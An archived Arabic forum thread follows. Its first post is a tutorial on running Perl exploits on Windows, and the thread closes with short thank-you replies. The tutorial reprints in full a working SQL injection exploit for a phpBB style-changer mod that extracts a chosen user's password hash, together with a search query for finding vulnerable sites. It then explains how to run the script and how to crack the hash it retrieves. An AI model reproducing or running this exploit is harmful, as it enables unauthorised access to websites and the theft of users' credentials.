العاب

 

 

منتدى دلع نجد ينتهي بتاريخ 22-8-2008
رسائل قصيره sms

 

الفنان  احلى الليالي ينتهي الاعلان في 2_9_2008  

شات-دردشة-دردشه-دردشة

 


العودة   منتديات برق > منتديات برق التقنية > الحماية من الهكر و الاختراق
التسجيل التعليمات قائمة الأعضاء التقويم البحث مشاركات اليوم اجعل جميع المنتديات مقروءة

الحماية من الهكر و الاختراق حماية موقعك حماية بريدك من الهكر حماية ايميلك يمنع نهائيا نشر اي موضوع اختراق او فيه ضرر على المسلمين مهما كانت نيته

 

 

شات سعودي  منتديات اغاني :: العاب : :: برامج نوكيا: بلوتوث :: زواج :: شات منتديات

شرح طريقة استغلال ثغرات البيرل

رد
 
LinkBack أدوات الموضوع إبحث في الموضوع طرق مشاهدة الموضوع
قديم 11-13-2007, 11:55 PM   #1
مشرف
 
الصورة الرمزية ياعيون دلع
 






معدل تقييم المستوى: 1ياعيون دلع is on a distinguished road
افتراضي شرح طريقة استغلال ثغرات البيرل

بسم الله الرحمن الرحيم
السلام عليكم ..
اليوم شباب غالى حشرح لكم طريقة استغلال ثغرات البيرل بعد الطلب من بعض المهتمين وعلى فكرة يا شباب فى ناس الانانية فى طبعهم تدخل تستفيد و من غير ان تضع كلمة شكر على الموضوع او على الاقل تفيد بأى معلومة جديدة يا ريت اشوف ردودكم و استفسارتكم
ندخل فى الجد بقى
طبعآ درس اليوم بيتكلم عن طريقة استغلال الثغرات المكتوبة بالغة من احد اللغات المعروفة و القوية ايضآ و هى لغة البيرل .. قبل ان نبدآ يجب ان نتعلم شىء مهم و هو كيفية معرفة الثغرات المكتوبة بالغة البيرل ..؟
عندما ننظر الى اى كود و نجد فى بدايتة :

رمز:
#!/usr/bin/perlاذآ علينا ان نعلم ان الثغرة التى سوف نتعامل معها هى احدى الثغرات المكتوبة بلغة البيرل ..
طريقة الاستغلال :
ــــــــــــــــــــــــــــــــــ
اولا:: اذا كنتم من مستخدمين بيئة الليونكس فهذا شىء ممتاز جدآ و لا حاجة لاى برنامج و اعتقد ايضآ انكم لستو فى حاجة لقرأة هذى الدرس .
اما اذا كنتم من مستخدمى بيئة الويندوز فعليكم بأستخدم برنامج ActivePerl
و ذالك لعمل كوبيلر لاكواد البيرل .
و هذة وصلة للبرنامج ::
http://www.cse.unsw.edu.au/~homecomp...SWin32-x86.msi
الان بعد تحميل البرنامج و عمل Setup لة على الجهاز سوف يكون على هذا المسار .

رمز:
C:\Perlالان كل شىء تمام نبدآ العمل
بعد ان نجد احد الثغرات مثال حناخد كمثال احد الثغرات اللى وضعتهم لكم فى قسم الثغرات و هى ::

رمز:
#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT #
#Created By SkOd #
#SED security Team #
#http://www.sed-team.be #
#skod.uk@gmail.com #
#ISRAEL #
################################################## #######
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
################################################## #######
use IO::Socket;
if (@ARGV < 3){
print q{
################################################## ##########
# phpBB Style Changer\Viewer MOD SQL injection Exploit #
# Tested on phpBB 2.0.19 #
# created By SkOd. SED Security Team #
################################################## ##########
bbstyle.pl [HOST] [PATH] [Target id]
bbstyle.pl www.host.com /phpbb2/ 2
################################################## ##########
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}اول شىء نعملة بعد معرفتنا ان هذا الكود لاحد ثغرات البيرل هو اننا نأخد الكود كلة Copy ونضعة Past فى الـ Notbad و نغلقها حيطلب منك عمل Save نضغط على كلمة Yes الان لدينا الكود على هيئة txt علينا ان نغير الامتداد من txt الى pl نفترض اننا سوف نقوم بتسمية الملف exploit.txt علينا ان نغير txt ليصبح بهذا الشكل exploit.pl الان و بعد التأكد من اتمام هذة العملية بنجاح علينا ان ضع الملف exploit.pl داخل الملف bin على هذا المسار

رمز:
C:\Perl\binو بعد و ضع الملف داخل هذا المجلد نذهب الى الـ Run الموجودة ضمن قائمة Start و نكتب cmd سيظهر لنا شاشة الدوس بهذا الشكل ::

و بعد ذالك ::


و بعد ان يتم عمل الترجمة لملف البيرل و يفتح امامنا سوف نشاهد طريقة الاستخدام الخاص لهذة الثغرة و كل ثغرة لها طريقة الاستخدام الخاصة بها و فى مثالنا هذا ::

و اعتقد المثال و اضح نكتب المطلوب بنفس الاسلوب اللى موجود فى الصورة اللى بالاعلى و نظغط انتر و شوفو النتيجة على حسب نوع الثغرة و عند الحصور على الباسورد بيكون بشكل مشفر ماعليك الا انك تفكة بأى برنامج او موقع من مواقع فك الباسورد ..
..:: اعزرونى اذا كان فى اى تقصير فى الشرح يا شباب و ان شاء الله اى استفسار انا حاضر ::..
و انتظرو شرح طريقة استغلال ثغرات الـ php و الــ Pm قريبآ ان شاء الله
تحياتى للجميع
برنـــــــ اوف دارك ــــــــــس



منقول للافاده


[img][/img]

منتديات مزايين1-2-2008

من مواضيع ياعيون دلع في المنتدى

ياعيون دلع غير متواجد حالياً   رد مع اقتباس
قديم 02-19-2008, 05:05 PM   #2
-||[عضو منــورنـا]||-
 





معدل تقييم المستوى: 0zaradusht is on a distinguished road
افتراضي

بارك الله فيك اخي الغالي و جازاك الف خير على هذ الشرح المتميز معى اني اعرف ان الرد متأخر لكن اخي هذه اول مشارك لي في هذا المنتدى حياك الله اخي الكريم

منتديات مزايين1-2-2008


zaradusht غير متواجد حالياً   رد مع اقتباس
قديم 02-24-2008, 08:38 PM   #3
-||[عضو منــورنـا]||-
 





معدل تقييم المستوى: 0عاشق الرومنسية is on a distinguished road
افتراضي

يسلمك ربي يالغالي

شرح متميز اوافي
لك جزيل الشكر والامتنان

تقبل تحياتي وتمنياتي 0-

منتديات مزايين1-2-2008

من مواضيع عاشق الرومنسية في المنتدى

عاشق الرومنسية غير متواجد حالياً   رد مع اقتباس
رد


أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم
طرق مشاهدة الموضوع

تعليمات المشاركة
لا تستطيع كتابة مواضيع
لا تستطيع كتابة ردود
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
التلقيح الصناعي أو الإخصاب داخل أو خارج الجسم مينوو طب - صحه - غذاء - الطب البديل - اعشاب - ريجيم 6 02-13-2008 11:30 AM
أفضل 16 طريقة لجماع الزوجة جداوي فله طب - صحه - غذاء - الطب البديل - اعشاب - ريجيم 6 02-09-2008 01:42 AM
طريقة فتح كمبيوتر مقفل برقم سري (باسورد) ღ الحــــزن ღ برامج كمبيوتر 12 10-07-2007 06:49 PM

مسلسلات تركية

 

شات كتابي-شات صوتي-دردشة كتابية-طرب توب-شات كويتي

مجلة هيا-العاب ماريو-منتديات-حضرموت صور افلام بنات يوتيوب العاب


Powered by vBulletin® Version 3.6.9
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.1.0

تـعـريب » شـبـكـة عـرب فـور هـوسـت

المقالات أو المشاركات أو الآراء المنشورة في شبكة منتديات برق بأسماء أصحابها أو بأسماء مستعارة لا تمثل بالضرورة الرأي الرسمي لشبكة برق بل تمثل وجهة نظر كاتبها.
  تصميم المبدعون
> منتديات برق منتديات عربية سعودية خليجية سنية يمنع نشر اي كراك او انتهاك لاي حقوق ادبية او فكريه ان كل ما يشنر في منتديات برق هو ملك لاصحابه